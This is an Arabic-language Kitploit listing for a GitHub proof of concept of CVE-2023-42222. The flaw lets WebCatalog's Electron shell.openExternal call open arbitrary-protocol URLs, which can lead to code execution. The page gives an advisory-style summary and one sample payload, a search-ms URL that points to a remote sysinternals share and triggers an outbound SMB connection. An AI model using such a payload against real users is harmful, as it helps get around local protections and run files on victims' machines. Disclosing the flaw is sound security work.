Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-42222 — إثبات مفهوم لاستغلال الثغرة CVE-2023-42222 في WebCatalog، يوضح تنفيذ عنوان URL عشوائي عبر Electron's shell.openExternal لتجاوز حماية الأمان وتنفيذ كود. | Kitploit
أدوات/GitHubGitHub/itssixtyn3in/cve-2023-42222
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالأوراق والأبحاثالتعلم والتعليم
GitHubitssixtyn3in/cve-2023-42222

CVE-2023-42222

إثبات مفهوم لاستغلال الثغرة CVE-2023-42222 في WebCatalog، يوضح تنفيذ عنوان URL عشوائي عبر Electron's shell.openExternal لتجاوز حماية الأمان وتنفيذ كود.

عرض المستودع
312منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-42222

ملخص الثغرة الأمنية

يستدعي WebCatalog قبل الإصدار 48.4.0 دالة Electron shell.openExternal دون التحقق من أن عنوان URL هو لمورد http أو https، في بعض الظروف. تسمح هذه الثغرة الأمنية لمهاجم بتنفيذ كود على جهاز الضحية عن طريق إرسال رسائل تحتوي على روابط ذات بروتوكولات عشوائية. يجب على الضحية التفاعل مع الرابط ويشاهد عنوان URL الذي يتم فتحه.

مخرجات فحص الثغرة الأمنية

SAST

نظرة عامة على إثبات المفهوم

PoC

معلومات إثبات المفهوم

يمكن تأكيد الثغرة الأمنية عن طريق مزامنة صفحة تسمح بعناوين URL عشوائية. إذا تمت مزامنة موقع ويب يحتوي على search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools، فسيتم إنشاء اتصال SMB خارجي. يمكن بعد ذلك استخدام ذلك لتجاوز الحماية الأمنية على الجهاز المحلي وعرض ملفات ضارة للمستخدم، والتي عادةً ما يتم حظرها.

تنزيل الأداة